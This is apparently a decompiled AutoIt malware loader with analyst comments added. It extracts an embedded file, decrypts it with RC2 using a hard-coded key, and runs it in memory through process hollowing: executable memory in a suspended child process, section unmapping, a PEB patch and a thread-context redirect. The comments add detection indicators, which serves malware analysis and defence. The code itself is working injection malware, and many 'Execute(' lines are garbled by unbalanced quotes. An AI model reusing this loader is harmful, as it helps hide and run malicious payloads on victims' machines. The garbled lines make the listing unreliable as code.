$24 = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "uint64 ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "uint64 SizeOfStackReserve;" & "uint64 SizeOfStackCommit;" & "uint64 SizeOfHeapReserve;" & "uint64 SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $7) | |
$7 += Execute( 112")) | |
Else | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
Local $26 = DllStructGetData($24, "AddressOfEntryPoint") | |
Local $27 = DllStructGetData($24, "SizeOfHeaders") | |
Local $28 = DllStructGetData($24, "ImageBase") | |
Local $29 = DllStructGetData($24, "SizeOfImage") | |
; Skip 40 bytes of data-directory entries (five 8-byte entries); $30 is therefore the
; sixth entry, which the code below uses as the relocation table (address $31, size $32).
$7 += Execute( 8")) | |
$7 += Execute( 8")) | |
$7 += Execute( 24")) | |
Local $30 = DllStructCreate("dword VirtualAddress; dword Size", $7) | |
Local $31 = DllStructGetData($30, "VirtualAddress") | |
Local $32 = DllStructGetData($30, "Size") | |
Local $33 | |
If $31 And $32 Then $33 = True | |
; The console message below is a literal string in the sample and can serve as a static indicator.
If Not $33 Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) | |
$7 += Execute( 88")) | |
; --- Obtain memory in the child. $35 becomes the base address actually used; $34 records
; whether relocations will be applied.
Local $34 | |
Local $35 | |
If $33 Then | |
$35 = _REALLY_FFFFFAXX($11, $29) | |
If @error Then | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
; Fallback: unmap whatever occupies the image's own base address, then retry.
Execute(_caliban($11, $28)")) | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(101, 1, 0) | |
EndIf | |
EndIf | |
EndIf | |
$34 = Execute( True")) | |
Else | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(_caliban($11, $28)")) | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(101, 0, 0) | |
EndIf | |
EndIf | |
EndIf | |
; Record the chosen base in the local copy of the headers before they are copied.
Execute(DllStructSetData($24, "ImageBase", $35)")) | |
; --- Build the in-memory layout locally ($36, SizeOfImage bytes): headers first, then
; each section at its virtual address.
Local $36 = DllStructCreate("byte[" & $29 & "]") | |
Local $37 = DllStructGetPtr($36) | |
Local $38 = DllStructCreate("byte[" & $27 & "]", $18) | |
Execute(DllStructSetData($36, 1, DllStructGetData($38, 1))")) | |
Local $39 | |
Local $40, $41 | |
Local $42, $43 | |
Local $44 | |
For $I = 1 To $22 | |
$39 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "word NumberOfRelocations;" & "word NumberOfLinenumbers;" & "dword Characteristics", $7) | |
$40 = Execute( DllStructGetData($39, "SizeOfRawData")")) | |
$41 = Execute( $18 + DllStructGetData($39, "PointerToRawData")")) | |
$42 = Execute( DllStructGetData($39, "VirtualAddress")")) | |
$43 = Execute( DllStructGetData($39, "UnionOfVirtualSizeAndPhysicalAddress")")) | |
; Copy the smaller of raw size and virtual size.
If $43 And $43 < $40 Then $40 = $43 | |
If $40 Then | |
Execute(DllStructSetData(DllStructCreate("byte[" & $40 & "]", $37 + $42), 1, DllStructGetData(DllStructCreate("byte[" & $40 & "]", $41), 1))")) | |
EndIf | |
If $34 Then | |
; Remember where the relocation table lives if it falls inside this section.
If $42 <= $31 And $42 + $40 > $31 Then | |
$44 = Execute( DllStructCreate("byte[" & $32 & "]", $41 + ($31 - $42))")) | |
EndIf | |
EndIf | |
$7 += Execute( 40")) | |
Next | |
; Adjust absolute addresses for the new base ($25 = 523 selects the 64-bit entry type).
If $34 Then _XVWRG243GGGGG($37, $44, $35, $28, $25 = 523) | |
; --- Write the prepared image into the child at $35.
$10 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $11, "ptr", $35, "ptr", $37, "dword_ptr", $29, "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(7, 0, 0) | |
EndIf | |
; --- Read the child's PEB, replace ImageBaseAddress with $35, and write it back.
Local $45 = DllStructCreate("byte InheritedAddressSpace;" & "byte ReadImageFileExecOptions;" & "byte BeingDebugged;" & "byte Spare;" & "ptr Mutant;" & "ptr ImageBaseAddress;" & "ptr LoaderData;" & "ptr ProcessParameters;" & "ptr SubSystemData;" & "ptr ProcessHeap;" & "ptr FastPebLock;" & "ptr FastPebLockRoutine;" & "ptr FastPebUnlockRoutine;" & "dword EnvironmentUpdateCount;" & "ptr KernelCallbackTable;" & "ptr EventLogSection;" & "ptr EventLog;" & "ptr FreeList;" & "dword TlsExpansionCounter;" & "ptr TlsBitmap;" & "dword TlsBitmapBits[2];" & "ptr ReadOnlySharedMemoryBase;" & "ptr ReadOnlySharedMemoryHeap;" & "ptr ReadOnlyStaticServerData;" & "ptr AnsiCodePageData;" & "ptr OemCodePageData;" & "ptr UnicodeCaseTableData;" & "dword NumberOfProcessors;" & "dword NtGlobalFlag;" & "byte Spare2[4];" & "int64 CriticalSectionTimeout;" & "dword HeapSegmentReserve;" & "dword HeapSegmentCommit;" & "dword HeapDeCommitTotalFreeThreshold;" & "dword HeapDeCommitFreeBlockThreshold;" & "dword NumberOfHeaps;" & "dword MaximumNumberOfHeaps;" & "ptr ProcessHeaps;" & "ptr GdiSharedHandleTable;" & "ptr ProcessStarterHelper;" & "ptr GdiDCAttributeList;" & "ptr LoaderLock;" & "dword OSMajorVersion;" & "dword OSMinorVersion;" & "dword OSBuildNumber;" & "dword OSPlatformId;" & "dword ImageSubSystem;" & "dword ImageSubSystemMajorVersion;" & "dword ImageSubSystemMinorVersion;" & "dword GdiHandleBuffer[34];" & "dword PostProcessInitRoutine;" & "dword TlsExpansionBitmap;" & "byte TlsExpansionBitmapBits[128];" & "dword SessionId") | |
$10 = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $11, "ptr", $16, "ptr", DllStructGetPtr($45), "dword_ptr", DllStructGetSize($45), "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(8, 0, 0) | |
EndIf | |
Execute(DllStructSetData($45, "ImageBaseAddress", $35)")) | |
$10 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $11, "ptr", $16, "ptr", DllStructGetPtr($45), "dword_ptr", DllStructGetSize($45), "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(9, 0, 0) | |
EndIf | |
; --- Point the thread's start register (Eax / Rcx) at new base + AddressOfEntryPoint.
Switch $13 | |
Case 1 | |
Execute(DllStructSetData($14, "Eax", $35 + $26)")) | |
Case 2 | |
Execute(DllStructSetData($14, "Rcx", $35 + $26)")) | |
Case 3 | |
EndSwitch | |
$10 = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $12, "ptr", DllStructGetPtr($14)) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(10, 0, 0) | |
EndIf | |
; --- Let the child run; from here it executes the written image, not the host file's code.
$10 = Execute( DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $12)")) | |
If @error Or $10[0] = -1 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(11, 0, 0) | |
EndIf | |
Execute(DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $11)")) | |
Execute(DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $12)")) | |
Return DllStructGetData($9, "ProcessId") | |
EndFunc | |
; Allocates $51 bytes in process $11 at the requested address $61 with VirtualAllocEx.
; First attempt uses allocation type 4096 (MEM_COMMIT); if that fails it retries with
; 12288 (MEM_COMMIT | MEM_RESERVE). Protection 64 is PAGE_EXECUTE_READWRITE.
; Returns the allocated address, or 0 with @error = 1.
; Detection note: a cross-process allocation that is writable and executable at once is
; uncommon in benign software and is a useful telemetry filter.
Func _NOTHING_IS_IMPOSSIBLE($11, $61, $51) | |
Local $10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", $61, "dword_ptr", $51, "dword", 4096, "dword", 64) | |
If @error Or Not $10[0] Then | |
$10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", $61, "dword_ptr", $51, "dword", 12288, "dword", 64) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
EndIf | |
Return $10[0] | |
EndFunc | |
; Applies base relocations to the locally prepared image.
;   $37 - pointer to the local image buffer
;   $46 - struct overlaying the relocation table
;   $47 - base address the image will actually have
;   $48 - base address the image was linked for
;   $49 - True for a 64-bit image
; Walks the table block by block (8-byte header: VirtualAddress, SizeOfBlock, followed by
; 16-bit entries). For each entry whose upper 4 bits equal $60, the pointer-sized value at
; block address + lower 12 bits has the delta ($47 - $48) added. $60 is 3 for 32-bit
; images and 10 (3 + 7) for 64-bit ones. Always returns 1.
; NOTE(review): SizeOfBlock comes straight from the image and is not validated here; a
; malformed table is read as-is.
Func _XVWRG243GGGGG($37, $46, $47, $48, $49) | |
Local $50 = $47 - $48 | |
Local $51 = DllStructGetSize($46) | |
Local $52 = DllStructGetPtr($46) | |
Local $53, $54 | |
Local $42, $55, $56 | |
Local $57, $58, $59 | |
Local $60 = 3 + 7 * $49 | |
; $54 is the byte offset of the current block within the table.
While $54 < $51 | |
$53 = Execute( DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $52 + $54)")) | |
$42 = Execute( DllStructGetData($53, "VirtualAddress")")) | |
$55 = Execute( DllStructGetData($53, "SizeOfBlock")")) | |
; Number of 2-byte entries after the 8-byte block header.
$56 = Execute( ($55 - 8) / 2")) | |
$57 = Execute( DllStructCreate("word[" & $56 & "]", DllStructGetPtr($53) + 8)")) | |
For $I = 1 To $56 | |
$58 = Execute( DllStructGetData($57, 1, $i)")) | |
If BitShift($58, 12) = $60 Then | |
$59 = Execute( DllStructCreate("ptr", $37 + $42 + BitAND($58, 0xFFF))")) | |
Execute(DllStructSetData($59, 1, DllStructGetData($59, 1) + $50)")) | |
EndIf | |
Next | |
$54 += Execute( $55")) | |
WEnd | |
Return 1 | |
EndFunc | |
; Allocates $51 bytes in process $11 with VirtualAllocEx, passing address 0 so the system
; picks the location. Allocation type 12288 is MEM_COMMIT | MEM_RESERVE and protection 64
; is PAGE_EXECUTE_READWRITE. Returns the address, or 0 with @error = 1.
Func _REALLY_FFFFFAXX($11, $51) | |
Local $10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", 0, "dword_ptr", $51, "dword", 12288, "dword", 64) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Return $10[0] | |
EndFunc | |
; Wrapper around IsWow64Process for the process handle $11. Returns the value of the
; "bool*" out-parameter ($10[2]), or 0 with @error = 1 if the call failed.
; _PNP23() uses it to refuse a 32-bit (WOW64) child when the caller is 64-bit.
Func _FVSDHUWEUGWEUIGHW325235235C($11) | |
Local $10 = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $11, "bool*", 0) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Return $10[2] | |
EndFunc | |
; Calls ntdll's NtUnmapViewOfSection for process $11 at base address $61, removing the
; mapping that currently occupies that address in the child. Used by _PNP23() only as a
; fallback when allocation at the image's own base address failed.
; Returns 1 unless the DllCall itself errors (@error = 1, return 0); the status value
; returned by the API is not inspected.
; Detection note: NtUnmapViewOfSection issued against a freshly created, still-suspended
; child process is a high-signal event for process-hollowing detections.
Func _CALIBAN($11, $61) | |
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $11, "ptr", $61) | |
If @error Then Return SetError(1, 0, 0) | |
Return 1 | |
EndFunc | |
; Main script: a loader that unpacks an embedded, encrypted payload and runs it in memory.
;   1. #NoTrayIcon suppresses the AutoIt tray icon, so the program shows no UI.
;   2. FileInstall extracts the resource compiled in as "no.edu" to <TempDir>\no.edu
;      (flag 1 = overwrite); the file is deleted beforehand (twice) if it already exists.
;   3. The file is read back and decrypted with _6() using the hard-coded password below
;      and algorithm "26114", which equals the $CALG_RC2 constant in this listing.
;   4. The decrypted bytes go to _PNP23(), with @ScriptFullPath as the command line.
; Analyst notes: the dropped path and the password string are static indicators for this
; sample, and because both key and ciphertext ship together the payload can be recovered
; offline for analysis. The extracted file is not removed after use in this listing.
; NOTE(review): the result of _6() is not checked; on failure it returns -1, which would
; be passed on and rejected by the "MZ" check inside _PNP23().
#NoTrayIcon | |
FileDelete(@TempDir & "\no.edu") | |
FileDelete(@TempDir & "\no.edu") | |
FileInstall("no.edu", @TempDir & "\no.edu", 1) | |
$ITSAPARTY = FileRead(@TempDir & "\no.edu") | |
Global $PUSES | |
$PUSES = _6($ITSAPARTY, "c4c6^5v8P2F1V5s8", "26114") | |
$EWTEWTWET = _PNP23($PUSES, @ScriptFullPath) | |
; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.11 build(180) |